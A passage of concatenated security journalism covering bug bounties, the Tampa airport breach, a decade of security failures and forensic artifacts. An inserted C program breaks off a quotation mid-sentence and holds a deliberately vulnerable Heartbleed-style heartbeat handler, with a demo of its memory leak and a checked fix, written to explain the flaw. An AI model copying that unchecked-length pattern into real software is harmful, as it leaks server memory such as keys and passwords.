profiles on various communities,” Komarov told SCMagazine.com via email. To avoid account compromise, researchers recommended users create a strong and unique password, use a password manager, and consider enabling Twitter's login verification.

GSA May Offer Bug Bounty Program For Federal Agencies

Researchers will be eligible for bounties of up to $3,500 for discovering bugs in federal agency systems. Apparently taking a cue from the over 450 organizations that already have a bug bounty program in place, the US General Services Administration’s 18F digital services group appears to be exploring the idea of hosting one for federal agencies. Details of the program were first reported by FedScoop and have not yet been publicly released.

But the 18F group’s page on GitHub offers a glimpse of what the GSA appears to have in mind for the program. The page shows that bug hunters who report high-severity vulnerabilities to agencies participating in the GSA bug bounty service could be eligible for a reward of up to $3,500, depending on the quality of the report.
Vulnerabilities that the GSA considers as high severity include SQL injection flaws, remote code execution errors, site-wide elevation of privilege or authentication bypass issues, and flaws that lead to widespread information disclosure. People who report medium severity flaws such as cross-site scripting errors (XSS) and cross-site request forgery (CSRF) vulnerabilities stand to make up to $1,000 per bug. Low severity flaws, such as server misconfiguration and provisioning errors, data leaks involving non-personally identifiable data, and open redirects will fetch $500. “We'll typically follow these guidelines closely, but we do reserve the right to adjust our rewards based on our assessment of severity and the quality of the report,” the description on the GSA 18F GitHub page noted. “For example, we may pay less for low-quality reports, or more for low-severity issues that are especially novel or required significant effort.” The page also has a long list of vulnerabilities that researchers are welcome to report to participating agencies but will not qualify for a bounty.

Among them are bugs that require attackers to gain physical access to a system, denial of service attacks, insecure cookie settings, and brute-force attacks that require a lot of time and resources to exploit. Bounties will be available only for vulnerabilities discovered in a specific list of federal agency sites that are in scope for the program.
Submissions covering out-of-scope websites will not be rewarded. No details are available yet on the agency sites that are in scope for the program and those that are out of scope because the program hasn’t officially launched yet. Dozens of technology vendors, and increasingly many non-tech companies such as United Airlines, Uber, Starbucks, and the Electronic Frontier Foundation, have similar bug bounty programs in place. If it launches the program, the GSA will become the second US federal government entity to have a bug bounty initiative.

Earlier this year, the Pentagon became the first when it launched a Hack The Pentagon commercial bug bounty program and did a one-month pilot run with it between April and May. The big question is what sort of warranties the program will offer against prosecution for those who do try and find bugs in agency systems, says Richard Stiennon, chief security analyst at IT-Harvest. “Will the GSA also protect those looking for bugs against prosecution for violating the Computer Fraud and Abuse Act?” he says. “Hacking systems is illegal, even when the intent is to expose vulnerabilities.” Without clear protections, researchers are unlikely to participate in the program, he says. “[But] if they will provide a get-out-of-jail free card even I would help them find vulnerabilities in government agencies' applications,” Stiennon says. Pete Lindstrom, an analyst at IDC, predicts that the program will attract a lot of curious hackers and possibly a lot of noise. “Presumably, the program will be less expensive than hiring experienced vulnerability researchers and QA folks internally,” he says.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...

Poor Airport Security Practices Just Don't Fly

Five lessons learned the hard way by the Tampa International Airport about bringing third parties into a security environment.

I love living in the Tampa area for a lot of reasons, among them getting to regularly use one of the best airports in the US – Tampa International Airport (TIA). Unfortunately for the folks who run TIA, they had a spot of trouble that was reported earlier this month by the Tampa Tribune and others. Like a lot of places these days, TIA experienced an IT security breach. Unlike a lot of places—because it's an international airport—TIA has to do a lot of explaining.

Here is what we know from what has been reported -- and it reads like an information security “Don’t Do List.” TIA hired an individual (and apparently his wife) to work on an Oracle project. That person shared their VPN logins and (privileged) accounts and passwords with almost a dozen other people and some others working for a staffing firm, “who logged into the system dozens of times from places like Mumbai and Pradesh, India, United Arab Emirates and Kashmir, India.” This episode brings into clear view the unfortunate collision of insecure VPNs, open vendor access, and a lack of best practices in password management. That collision has led to multiple people losing their jobs, including the IT Director, an IT manager, and others. It has also led to TIA being forced to cripple its business processes by taking the drastic, but at this point probably necessary, step of only allowing the airport's computer network to be accessed from equipment issued by the aviation authority, not from personal electronic devices. So as a result of the breach, because TIA didn’t set up access correctly to start, they now have to go back to how we did things 20 years ago. There is a better way. Here are five lessons that any company bringing third parties into their security environment should take into account.

1. Never trust your vendors when it comes to YOUR information security. Properly vet the third parties, contractors, and consultants who are working for you. “Body shops” in IT services are not known for their cutting-edge information security. They may have some consultants for hire, but that doesn’t equate to them having a mature security posture of their own. Be sure to understand how they screen the temps they’re giving you and see if they include security awareness training as part of how they handle their stable of workers.

2. When you must allow third-party access into your environment, you don’t have to use a legacy solution such as a VPN and hope that everyone behaves in how they use it. A solution using a brokered connection that allows you to control the Who, What, Where, When, and How of their connection to you gives you real control. As The Offspring song goes, “You gotta keep ‘em separated!” And you can -- and still have third parties working on your projects, without giving them an IP-enabled grappling hook into your internal network.

3. Don’t give blanket access. Your vendors should be part of a mature workflow process that tracks everything from their need for access to granting it to revoking it. This gives you attribution and accountability.

4. Monitor the access you are granting them. Have the ability to “peek over their shoulder” whenever you want. Record all the activity. A pretty disturbing note in the TIA hack is the fact that even after security auditors investigated the breach, they were “unable to determine specifically what data may have been transferred.” Recording what is going on when your vendors are accessing your networks and systems makes sure you always know exactly what they did or didn’t do. This is good practice for everything from project tracking and billing to completing an annual security audit to having to respond to a breach such as the one that occurred at TIA.

5. Secure passwords.

Another element that stands out here is that there seems to have been a complete lack of control over password policy at TIA. This can be remedied quickly and completely by using a password/credential vaulting solution. In this way, you mitigate the risk of weak, shared, and duplicate passwords as well as the dangers posed by embedded system accounts or shared accounts. As with most breaches, this is a very good learning opportunity for others, and in the long run for Tampa Airport as well.

Joe Schorr is Director of Advanced Security Solutions for Bomgar, a secure access solutions provider. He has over 20 years professional services and industry experience in information technology and information security.

Before joining Bomgar, Joe was a Strategic Solutions ...

Epic Security #FAILS Of The Past 10 Years

In honor of Dark Reading's 10-year anniversary, a look at ten of the biggest failed security trends, technologies, and tactics. There’s nothing like the lens of 20-20 hindsight to spot and call out the biggest security failures over the past ten years.
Some #FAILS are technologies that have outlived their usefulness, and others are shortsighted strategies or mindsets on which the bad guys ultimately capitalized. In celebration of the 10th anniversary of Dark Reading and after vigorous debate, we have come up with a list of 10 of the biggest security fails since 2006.

This is by no means a comprehensive list, nor are these in any particular order. We fully expect this to generate heated debate, so feel free to post your comments and thoughts below. Meantime, a little perspective: many of the new security strategies and approaches we laud today also will become obsolete and in some cases, #FAILS. Here goes:

Perimeter Security

You know the mantra: The network perimeter is evaporating. Mobile devices, cloud, and now the Internet of Things, have sucked the life out of traditional, static “set it and forget it” network security, and the bad guys are bypassing the corporate firewall with spear phishing emails that land on the desktops or devices of end users. Even so, firewalls remain a major force in enterprise security: a recent survey of IT security pros found that 91% say firewalls remain critical to their security and will for the next five years.

And 61% say firewalls are among the top three security tools they run, according to the InformationWeek 2015 Strategic Security Survey.

The good news is firewall technology is evolving, too, with application-layer and cloud-based options. Traditional intrusion prevention and detection systems also carry much of the same signature-driven baggage. But clinging to the old castle/moat model has been a wakeup call for many enterprises, while others (mostly SMBs) are still in denial that their old-school firewall stops hackers.

Signature-Based Technology

Antivirus is dead. Well, sort of.

Few security experts recommend uninstalling the old stand-by for catching known attacks, but the signature-based, reactionary model of security continues to fail organizations on a daily basis. Traditional AV companies are distancing themselves from the old model, focusing more on layers of security, including a new generation of endpoint security that’s more dynamic and able to spot unusual behaviors, endpoint detection and response (EDR).

The tipping point toward the evolution of endpoint security away from pure blacklisting and signature-based technology was the series of massive and high-profile attacks over the past few years on big-name brands like Target, Home Depot and Sony, security experts say. "A lot of things were slipping through the cracks [with AV] because there are a lot of behaviors that are not known as good or bad. We saw the need to see everything" with a lightweight footprint, Josh Applebaum, vice president of product strategy at Ziften Technologies, an EDR startup, said recently. "Home Depot didn't even deploy all of its AV to all endpoints because of the heavyweight aspect of it." Candace Worley, senior vice president and general manager of endpoint security at Intel Security, described AV’s role this way: "AV will have a tertiary role at best going forward," Worley said. "It's a solution that does the janitorial work … it reduces significantly the amount of malware noise in the organization, and then you can focus on the unknown [threats]."

End Users

Users are the easiest target for both cyber attackers as well as frustrated security professionals looking to lay blame somewhere for data breaches and security incidents in their organizations.
Social engineering experts say human nature is what backfires on end users: they’re trusting and want to be helpful, so they’ll open that attachment, or make that funds transfer purportedly requested by an executive via email. You can’t patch users, so what’s left? Under-provisioning their access – the least privilege approach, where a user only has access to data he actually needs to do his job -- is one strategy that’s been around for nearly a decade but not taken seriously until recently. Then there’s the rogue end user, with Edward Snowden as the poster child, which showed that even the most secretive government agencies in the world could get 0wned by one of its own users who had too much data access. "Up until this [Snowden] case, it was all about providing support, getting customers supported, and getting data to the right people.
It was not about analyzing [the admin's] access," Bob Bigman, former CISO of the CIA, said in the wake of NSA breach. "To provide support, Snowden was given more access than he should have been given ... What exacerbated it was that not only did he have access to his systems there, but systems he had privileges on that were trusted to other systems within NSA.

That enabled him to jump [among] various systems ...
It was all done under the banner of customer support." With mobile, cloud, and third-party contractors all accessing the corporate network, reining in the well-meaning and the potentially malicious end user has become a massive and vital job.

Passwords

It’s 2016, and we’re still talking about how lame passwords are as an authentication mechanism.
It’s not just the fact that most users pick dictionary-guessable, weak passwords and then use their favorite one across multiple online accounts.
It’s that even those users who try to create strong passwords and don’t reuse their P$sw&^Rd$ are still getting 0wned every day. The new Verizon Data Breach Investigations Report (DBIR) says it all: 63% of all data breaches in 2015 used legitimate credentials, whether weak, default, or stolen ones.
Stolen credentials topped the list of threat action types among attacks that used legitimate credentials, followed by malware, phishing, and keyloggers. And of all reported data breach incidents worldwide, half exposed passwords and email addresses, according to a Risk Based Security study. It’s not that there aren’t alternatives to passwords.

There are stronger authentication options such as multi-factor authentication (MFA), biometrics, password managers, and the Fast Identity Online (FIDO) Alliance, for example.

There are signs of change, at least in MFA: most social media sites offer MFA, and most recently, the PCI Data Security Standard (PCI DSS)’s new version 3.2 requires the use of MFA for anyone accessing cardholder data. “The PCI DSS has always required that any untrusted, remote access into the cardholder data environment use multi-factor authentication. With version 3.2 we’re taking it one step further to help organizations protect against both internal and external actors,” Emma Sutcliffe, senior director of data security standards for the PCI Security Standards Council, recently wrote in a piece for Dark Reading. Even so, most organizations still use passwords alone as their primary method of authenticating users or visitors on their websites. So the cycle of stolen passwords continues.

Point-of-Sale Systems

Retailers got a painful wakeup call in 2014 when a wave of point-of-sale (PoS) system hacks hit the biggest names: Target, Home Depot, Michael's, Dairy Queen, Kmart, and many others.

At the heart of the majority of the breaches was payment card-stealing malware infecting their PoS systems, which took advantage of both the magnetic-stripe card payment model as well as vulnerable PoS terminals and systems. In some cases, it was the retailer’s own PoS security model, and in others, it was that of the PoS vendor. PoS vendor Signature Systems, for example, was hit with a breach where an attacker stole the username and password used to remotely access its PoS systems: the attacker then installed malware that grabbed payment data from the PoS vendor’s retailer customers. To date, there are multiple families of malware customized for PoS systems. One of the most outspoken executives who’s been there – to the tune of 130 million US payment cards stolen in his company’s 2008 data breach – was Heartland Payment Systems chairman and CEO Robert Carr. Carr argues that retailers need to get on board not only with chip-and-pin card technology, but also end-to-end encryption and tokenization.

The move to chip-and-pin payment card technology -- where smart cards with embedded microchips authenticate the user's identity -- "is forcing merchants to change out their hardware and thereby spend money to get the equipment they need to get the [card] data out of their systems," he said in an October 2014 interview with Dark Reading. "If you make that hardware change, [it's] insane if you don't also solve the encryption issue. Put tokenization in to protect yourself on the backend," as well. Of the wave of record-breaking retail breaches, Carr said there was a common theme: "What's happening in the meantime is, even though solutions are being introduced, encryption being one we [adopted]… a lot of companies haven't implemented the basics, and they are paying the price for it."

SSL

Netscape first created Secure Sockets Layer (SSL) in 1994 for encrypting communication between a browser and a Web server.
Since then, SSL has gone through various iterations and updates—including being renamed Transport Layer Security (TLS)—and plenty of security failures. Given the post-Snowden era of Encrypt (Almost) All The Things, SSL’s shortcomings have been the source of much criticism and angst.

The Internet Engineering Task Force (IETF) has been working to streamline the newest versions of TLS to cut out the fat that leaves unnecessary and potentially vulnerable features and functions in the specification, and ultimately, in code. "Having options in there that are a smoking gun and one developer gets wrong… could lead to a huge security problem," Russ Housley, chair of the Internet Architecture Board (IAB), told Dark Reading in late 2014. It was just that scenario that led to the infamous and pervasive Heartbleed vulnerability in the OpenSSL implementation of the encryption protocol. Heartbleed came out of an error in OpenSSL's implementation of the "heartbeat" extension in TLS.

The bug, if exploited, could allow an attacker to leak the contents of the memory from the server to the client and vice versa.

That could leave passwords and even the SSL server's private key potentially exposed in an attack. After Heartbleed came many more big SSL bugs: POODLE, Bar-Mitzvah, and FREAK, to name a few. Remember SSLStrip and THC-SSL-DOS? Don’t even get us started on the certificate authority (CA) mess: one of the worst breaches was now-defunct CA DigiNotar, whose breach led to attackers issuing 500 fake SSL certificates. Even one of the fathers of SSL, Taher Elgamal, has pointed to weaknesses in the old protocol, which is now being used in ways not envisioned by its creators, and called for ways to shore up its weaknesses.
In a 2011 blog post on Dark Reading, Elgamal wrote: “Each website can choose the authentication method it desires, as long as browser and client support can be established somehow.
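The Heartbleed defect described above, as an added C illustration that is not OpenSSL's code: a simplified heartbeat handler that trusts the message's own length field, beside the bounds-checked form that the fix amounts to. The message layout and 16-byte minimum padding follow RFC 6520; the 64-byte claimed length and the "secret" bytes placed after the record are constructed for the demonstration.

```c
/*
 * Added illustration, not OpenSSL's code: a simplified TLS heartbeat handler
 * in the shape that produced Heartbleed, beside the bounds-checked version.
 * Message layout follows RFC 6520: type (1 byte), payload_length (2 bytes,
 * big-endian), payload, then at least 16 bytes of padding.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_HDR_LEN  3   /* type + payload_length */
#define HB_PADDING  16  /* minimum padding required by RFC 6520 */

/* TLS encodes lengths big-endian on the wire. */
static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Shared response construction; the two handlers differ only in validation. */
static int hb_build_response(const uint8_t *rec, uint16_t payload_len,
                             uint8_t *out, size_t out_cap)
{
    size_t need = (size_t)HB_HDR_LEN + payload_len + HB_PADDING;
    if (need > out_cap) return -1;
    out[0] = HB_RESPONSE;
    out[1] = rec[1];                    /* echo the length field as received */
    out[2] = rec[2];
    memcpy(out + HB_HDR_LEN, rec + HB_HDR_LEN, payload_len);
    memset(out + HB_HDR_LEN + payload_len, 0, HB_PADDING);  /* fresh padding */
    return (int)need;
}

/*
 * Vulnerable shape: trusts the peer-supplied payload_length and copies that
 * many bytes without comparing it to rec_len, the number of bytes actually
 * received. When the field lies, memcpy runs past the record into whatever
 * neighbours it in memory, and that memory is echoed back to the peer.
 */
int hb_respond_unchecked(const uint8_t *rec, size_t rec_len,
                         uint8_t *out, size_t out_cap)
{
    (void)rec_len;                       /* the real length is never consulted */
    if (rec[0] != HB_REQUEST) return -1;
    return hb_build_response(rec, be16(rec + 1), out, out_cap);
}

/*
 * Checked shape (what the fix amounts to): first make sure the record can hold
 * the header and minimum padding, then that header + declared payload + padding
 * fits within rec_len. Anything else is silently discarded, as RFC 6520 directs.
 */
int hb_respond_checked(const uint8_t *rec, size_t rec_len,
                       uint8_t *out, size_t out_cap)
{
    if (rec_len < (size_t)HB_HDR_LEN + HB_PADDING) return -1;
    if (rec[0] != HB_REQUEST) return -1;
    uint16_t payload_len = be16(rec + 1);
    if ((size_t)HB_HDR_LEN + payload_len + HB_PADDING > rec_len) return -1;
    return hb_build_response(rec, payload_len, out, out_cap);
}

/* Constructed scenario: a 4-byte payload whose length field claims 64 bytes. */
#define DEMO_CLAIMED 64
#define DEMO_ACTUAL  4
static const char DEMO_SECRET[] = "SESSION-KEY-0xDEADBEEF";  /* constructed stand-in */

struct demo_result { int unchecked_len; int checked_len; int secret_leaked; };

struct demo_result run_demo(void)
{
    uint8_t arena[256] = {0};  /* stands in for a slice of process memory */
    uint8_t out[256] = {0};
    struct demo_result r = {0, 0, 0};
    size_t rec_len = HB_HDR_LEN + DEMO_ACTUAL + HB_PADDING;  /* bytes really received */

    arena[0] = HB_REQUEST;
    arena[1] = (uint8_t)(DEMO_CLAIMED >> 8);
    arena[2] = (uint8_t)(DEMO_CLAIMED & 0xff);
    memcpy(arena + HB_HDR_LEN, "ping", DEMO_ACTUAL);
    /* Unrelated data that happens to sit right after the record in memory. */
    memcpy(arena + rec_len, DEMO_SECRET, sizeof DEMO_SECRET);

    r.unchecked_len = hb_respond_unchecked(arena, rec_len, out, sizeof out);
    /* Bytes copied from arena[i] land at out[i], so the secret, if leaked,
       sits at the same offset in the response as it did in memory. */
    r.secret_leaked = r.unchecked_len > 0 &&
        memcmp(out + rec_len, DEMO_SECRET, sizeof DEMO_SECRET - 1) == 0;
    r.checked_len = hb_respond_checked(arena, rec_len, out, sizeof out);
    return r;
}

/* An honest record (declared length matches what was sent) passes the check. */
int honest_record_response_len(void)
{
    uint8_t rec[HB_HDR_LEN + DEMO_ACTUAL + HB_PADDING] = {HB_REQUEST, 0, DEMO_ACTUAL, 'p', 'i', 'n', 'g'};
    uint8_t out[64];
    return hb_respond_checked(rec, sizeof rec, out, sizeof out);
}

int main(void)
{
    struct demo_result r = run_demo();
    printf("unchecked: %d bytes, secret leaked: %s\n", r.unchecked_len, r.secret_leaked ? "yes" : "no");
    printf("checked:   %d (record discarded)\n", r.checked_len);
    return 0;
}
```

Run as-is, the unchecked handler returns 83 response bytes that include the neighbouring "secret" bytes, while the checked handler discards the same record.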

Alternatively, the strong authentication method desired could be used to “unlock” a private key with a digital certificate on the client side that can be used to provide the client authentication requested by the SSL server.”

Wide Open Ports

Remember when your grandparents would quip, “Do you live in a barn?” when you left a door open? Well, there are literally millions of sensitive networked devices sitting out on the public Internet with communications ports left wide open, just asking for bad guys to come on into the barn and take over the farm. Renowned researcher HD Moore pioneered research here, with his now-Project Sonar, which scans the Internet for exposed devices and systems. Over the years, Moore has found major holes in embedded devices, home routers, corporate videoconferencing systems, web servers, and other equipment on the public Internet, all of which harbor weaknesses such as default backdoor-type access, default passwords, exposed ports, broken firewall rules, and other security holes ripe for the picking by bad guys. In 2013, Moore and fellow researcher Dan Farmer found some 300,000 servers exposed on the public Net via the Intelligent Platform Management Interface (IPMI). Moore found that the IPMI protocol as well as the Baseboard Management Controllers packaged with most servers for remote management purposes contained serious flaws that could allow an attacker to steal data from attached storage devices, install backdoors in the servers, alter the operating system, and launch denial-of-service attacks, among other things. The issue of open ports is taking an even more sinister turn as networked consumer devices abound: the big zero-day bug in the 2014 Jeep Cherokee remotely hacked by Charlie Miller and Chris Valasek was a glaringly simple open communications port.

The unnecessarily open port 6667 allowed them to gain control of the Jeep's steering, braking, high beams, turn signals, windshield wipers and fluid, and door locks, as well as reset the speedometer and tachometer, kill the engine, and disengage the transmission so the accelerator pedal failed.

The flaw was reachable via the Harman uConnect infotainment system’s built-in Sprint cellular connection, which Sprint later closed.

Java and Flash

Cybercriminals and nation-states notoriously pick on the easy mark for their client-side exploits: first it was Java, and now it’s Adobe Flash. The attacks on Java got so bad in 2012 and 2013 that calls began to uninstall the client program; popular browsers also disabled it.
Some 95% of endpoints running Java in March of 2013 were vulnerable to at least one Java exploit, according to a Websense report, and 75% were running a version of Java in their browsers that was at least six months out of date; two-thirds, a year out of date; and 50 percent, more than two years out of date. Besides its security holes, Java’s other big problem was that patching and updating did not override older, less secure versions. Many developers had written applications based on older versions of Java, or to a specific version of Java that, if upgraded to the latest iteration, would lose some features or functions. Then there’s Flash, which is the next Java when it comes to bugs and exploits in the wild.

The new Symantec Internet Security Threat Report found that four of the top five most exploited zero-day bugs were found in Flash. "From a security perspective, we expect Adobe Flash will gradually fall out of common usage over the next year," Symantec said in the report. In a sample of ransomware victims, Verizon found that more than half of browsers were running Flash versions that were a year or more old.

The calls to uninstall and disable Flash are coming fast and furious now.

Online Advertising

The digital advertising space is a lucrative one, so it’s no shock that criminals are cashing in, big-time, to the tune of $7.2 billion in damages to digital advertisers, while the average brand has suffered $10 million in losses, according to a report by the Association of National Advertisers and WhiteOps. Criminals operating big botnets have mastered the art of tricking advertisers with phony ad impressions: they either use phony sites that push ads to bots, or they employ other nefarious ways to boost traffic unethically using third party services that are either legit or shady. The ad industry is painfully aware of the problem but has struggled to get a handle on it. Bob Liodice, president and CEO of the ANA, whose membership includes more than 640 companies with 10,000 different brands that spend more than $250 billion in marketing and advertising, has raised the alarm about online ad fraud. "How fraudsters work and their incredible intelligence stunned me.
I never realized the level of sophistication" they had, said Liodice, who has raised the alarm about online ad fraud for some time now. "They lowered their activity to diminish the findings of fraud" once word got out about the study, he said of last year’s report. "It's frightening for everyone involved in this... We have to stop this.

Every CMO that's doing any form of screen or digital advertising has to recognize that criminal activity is not a cost of doing business.

There is an ethics and moral" responsibility to stopping advertisers from inadvertently enabling crime, Liodice says. But cleaning up the online advertising fraud isn’t happening overnight: this year’s report actually showed a $2.2 billion increase in losses to online ad fraud.

Law Enforcement and Legislation

The glass is half full for law enforcement if you consider the arrests and prosecution of some of the most notorious cybercriminals in the past ten years: TJX and retailer hacker Albert Gonzalez; members of LulzSec (including flipping “Sabu” as an FBI informant); Nikita Kuzmin, the mastermind behind Gozi; Arthur Budovsky, 42, founder of digital currency empire Liberty Reserve, who was just sentenced to 20 years in prison and fined $500,000 Friday for running a massive money laundering enterprise used by cybercriminals; and Vladimir Tsastsin, who was sentenced to 87 months in prison by a US court for hacking into 4 million computers in over 100 countries and infecting them with malware. But then there are the other unknown number of cybercriminals and cyber espionage hackers who have gotten away and will never be brought to justice. With extradition resistance from Russia and China, which host the majority of the cybercrime (Russia) and cyber espionage (China) hackers, law enforcement officials in the US and elsewhere have struggled to prosecute the bad guys behind the hacks. So much of the focus has been on disrupting the hacker infrastructures, such as crippling their botnets or shuttering their domains.

Those are mostly temporary fixes, of course, as these well-oiled and financed operations just rebuild somewhere else in many cases. The FBI recently offered a $3 million bounty for information on the whereabouts of Evgeniy Mikhailovich Bogachev, who faces charges for his alleged role as head of the infamous GameOver Zeus botnet, which was disrupted by a multinational effort in 2014.

Bogachev was named in a US Department of Justice indictment that year, but reportedly remains at large in Russia. Meanwhile, the DOJ flexed its muscle at China in May of 2014, indicting five members of the Chinese military for allegedly hacking and stealing trade secrets of major American steel, solar energy, and other manufacturing companies, including Alcoa, Westinghouse Electric, and US Steel. None have been extradited to the US. DOJ took a similar tack in March of this year against Iranian-backed hackers, with indictments of seven Iranians allegedly behind a massive DDoS campaign from 2011 to 2013 against the US financial sector, and a 2013 breach of a Windows XP server at a dam.
Iran hasn’t sent any of the defendants to the US, either. Another missing element of the legal equation, of course: comprehensive national data breach legislation.

A deadlocked and highly partisan Congress over the past few years hampered efforts to get any real laws passed for cyberattack fallout, and there’s been plenty of debate over Obama administration efforts to crack down on cybercrime. Security experts worry that bug bounty programs and other vulnerability research could inadvertently get swept up in any new legislation. “Cybersecurity legislation is a complex topic.
I think the intention of the law is largely a good one: government wants to crack down on criminals who have the potential to cripple infrastructure that is vital not only to business but to the lives of citizens in general.

Defining laws that would only target the bad guys, however, is a very tricky thing,” wrote security expert Jeremiah Grossman in a recent column on Dark Reading. Read how it all started when Steve Stasiukonis, in 2006, turned a socially-engineered thumb drive giveaway into a serious internal threat.

The piece was one of the most popular reads in Dark Reading history.

Kelly Jackson Higgins is Executive Editor at DarkReading.com.
She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...

Why Security Investigators Should Care About Forensic Research

Despite the promise of expanded visibility into the user trail behind a data breach, the security industry has largely ignored the meticulous advances of forensic researchers. Privacy is just one reason for the snub.

This summer, thousands of forensic specialists will descend on the desert of Las Vegas to hear original research at conferences such as EnFuse, HTCIA and to a lesser degree, Black Hat.

They'll learn of breakthroughs made in discovering new varieties of evidence left when users and software interact with the OS. This almost naturally occurring residue exists without any monitoring software present, and is far more comprehensive than log file data. Yet, despite its promise of new visibility into security breaches, and the privacy implications of a forensic trail on our PCs and phones, it will receive little publicity. Unlike new malware and vulnerability research, there is no financial incentive for forensic researchers to shout their findings from the mountaintops.

Vendors typically pay bounties for vulnerabilities; for new forensic "artifacts," they generally do not. Years ago, Apple was "Slashdotted" for tracking user GPS coordinates, and Facebook for not stripping GPS data from images. Yet outside these two cases of vendors "patching" away GPS artifacts, most have seemingly resigned themselves to the fact that forensic tools will learn an uncomfortable amount about us.

Little Publicity for Shocking Forensic Discoveries

Outside of the GPS tracking stories, little media attention has been paid to forensics. Possibly the research has been ignored because it is not as sexy as stories of hacked planes or lawsuits over vulnerability disclosure.
In the media's defense, the forensic privacy onslaught has occurred in tiny increments, and with a technical subtlety few would appreciate. Take the case, several years ago, in which someone decoded the .bmc files that the Remote Desktop client leaves behind on the machine from which a user logged in to a Windows system.

Encoded in these files were partial screen images, sent tile by tile during a Windows session and cached by the client so that it does not have to request the same bitmaps again.
In forensic circles, many were shocked: they're leaving behind images of all our remote Windows sessions, really? Outside forensic circles, no one noticed.

By itself this is not a headline, yet it adds another piece to the puzzle, allowing investigators to take a machine and travel back in time to see almost all prior activity. It's not just about what users leave behind; there is a wealth of evidence left when malware runs, but the user trail is increasingly helpful during security breaches.

Since the InfoSec group can't patch employees, social engineering attacks are today's most common entry point, and they leave plentiful evidence. The forensic motherlode accrues during the command-and-control phase of a breach, which plays out over many months.

Bad actors own boxes, steal credentials, and hijack user accounts early in yearlong breaches.
In many cases, user accounts are used to remotely log into new machines and search for sensitive data.

These breadcrumbs are remarkably similar to those of whistleblowers or disgruntled insiders.

As a matter of fact, it often takes a forensic investigation to distinguish between internal and external threats.

Forensic Professionals Are Paid for Discretion

I think another reason forensics falls under the radar is its culture of discretion, which stems from the circumstances of a forensic examiner's job. Within corporations, they may work with InfoSec, compliance, HR, or even legal departments.

They might read your work email, or -- having investigated intellectual property cases -- might be one of the few knowing all 11 of KFC’s herbs and spices. Hell, they’ve even seen your CEO’s browsing history.

Think about how personal that might be, especially in the BYOD era, where business and personal mix within our phones and tablets. I've heard a forensic examiner call one's browsing history a "window into the soul." Browsing history is apparently interesting even for the blandest user. "Everyone has a dark side, or different personality on the Internet," the examiner said.

But, again, while forensic visibility into our browsing habits might be a concern for our individual privacy, it also allows forensic security professionals to investigate links clicked in phishing emails, or activity related to malicious “watering hole” sites. Forensics’ culture of discretion runs even deeper outside corporate circles.

There’s a good chance an examiner may have spent time in law enforcement, or done forensics for the military or intelligence agencies.

At a conference like HTCIA or EnFuse, be careful discussing work over a few beers.
Internal filters are often broken, as yours would be if you’d seen the disturbing crimes they’ve seen.

For instance, I learned what it sounds like when an estranged wife dissolves her unconscious husband in a giant barrel of acid.

Don't worry, I won't tell the serial killer stories here.

From Law Enforcement to Cyber War

Simon Key, who develops training curriculum for a leading forensic security company and presents original research every few years, is an example of one such colorful fellow. Simon was a sergeant in the UK's Northamptonshire Police. His forensic work related to cases of stolen property, drug trafficking, and a murder or two, but the majority of it involved child abuse images. Simon Key was part of "Operation Avalanche," one of the larger child pornography investigations, which saw 100 arrests and 144 suspects.

While forensics provides the visibility into computers that convicts bad guys, the truth can also set men free. Mr. Key was able to examine old cached Web pages to determine which users were actual pedophiles versus those who had visited in the context of a payment gateway for a legitimate adult site.

As a forensic researcher, Mr. Key is best known for a nifty trick to locate long-deleted file fragments by hashing pieces of files called blocks, allowing identification of partial files. He has also reverse-engineered numerous Mac OS X artifacts, including QuickLook images, which can contain the rendered content of files.
Sorry, Mr. Mac user, regarding that private file you took painstaking steps to encrypt: it’s possible the OS grabbed some of its content in QuickLook artifacts and will reside on your disk for years.
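To show what the block-hashing trick above looks like in practice, here is an added example; it is not code from the author or from Guidance Software. It hashes a known file block by block, walks an image at the same granularity, and reports every image offset whose hash is in the table, so a file that has been deleted and partly overwritten can still be identified from the surviving blocks. The "known file", the "image" and the 512-byte block size are all constructed for the example. The one refinement worth keeping is that blocks made of a single repeated byte (zero fill, padding) are never indexed or reported, because they occur in every image and would match everywhere.

```python
import hashlib
import random

BLOCK_SIZE = 512  # assumed granularity; one disk sector is the usual choice


def _is_trivial(block):
    # A block of one repeated byte (zero fill, 0xFF padding) appears in countless
    # files; indexing it would produce a hit at nearly every offset of the image.
    return len(set(block)) == 1


def block_hashes(data, block_size=BLOCK_SIZE):
    """Hash every full block of a known file. Returns {sha256: [block indexes]}."""
    table = {}
    for i in range(0, len(data) - block_size + 1, block_size):
        block = data[i:i + block_size]
        if _is_trivial(block):
            continue
        digest = hashlib.sha256(block).hexdigest()
        table.setdefault(digest, []).append(i // block_size)
    return table


def scan_image(image, table, block_size=BLOCK_SIZE):
    """Walk an image block by block; return [(image_offset, [known-file block indexes])]."""
    hits = []
    for off in range(0, len(image) - block_size + 1, block_size):
        digest = hashlib.sha256(image[off:off + block_size]).hexdigest()
        if digest in table:
            hits.append((off, table[digest]))
    return hits


def coverage(hits, total_blocks):
    """Fraction of the known file's blocks that were recovered from the image."""
    found = {idx for _, idxs in hits for idx in idxs}
    return len(found) / total_blocks


def build_sample():
    """Constructed data: an 8-block 'known file' (one block is all zeros) and a
    32-block zero-filled 'image' holding only three of its blocks, scattered."""
    rng = random.Random(1)
    blocks = [bytes(rng.getrandbits(8) for _ in range(BLOCK_SIZE)) for _ in range(8)]
    blocks[5] = b"\x00" * BLOCK_SIZE               # zero block inside the known file
    known = b"".join(blocks)
    image = bytearray(32 * BLOCK_SIZE)
    image[4 * BLOCK_SIZE:6 * BLOCK_SIZE] = blocks[2] + blocks[3]   # contiguous fragment
    image[20 * BLOCK_SIZE:21 * BLOCK_SIZE] = blocks[6]              # lone block far away
    return known, bytes(image)


def demo():
    """Index the constructed file, scan the constructed image, report what survives."""
    known, image = build_sample()
    hits = scan_image(image, block_hashes(known))
    return hits, coverage(hits, len(known) // BLOCK_SIZE)


if __name__ == "__main__":
    hits, cov = demo()
    for off, idxs in hits:
        print(f"image offset {off:#x} holds known-file block(s) {idxs}")
    print(f"recovered {cov:.0%} of the known file")
```

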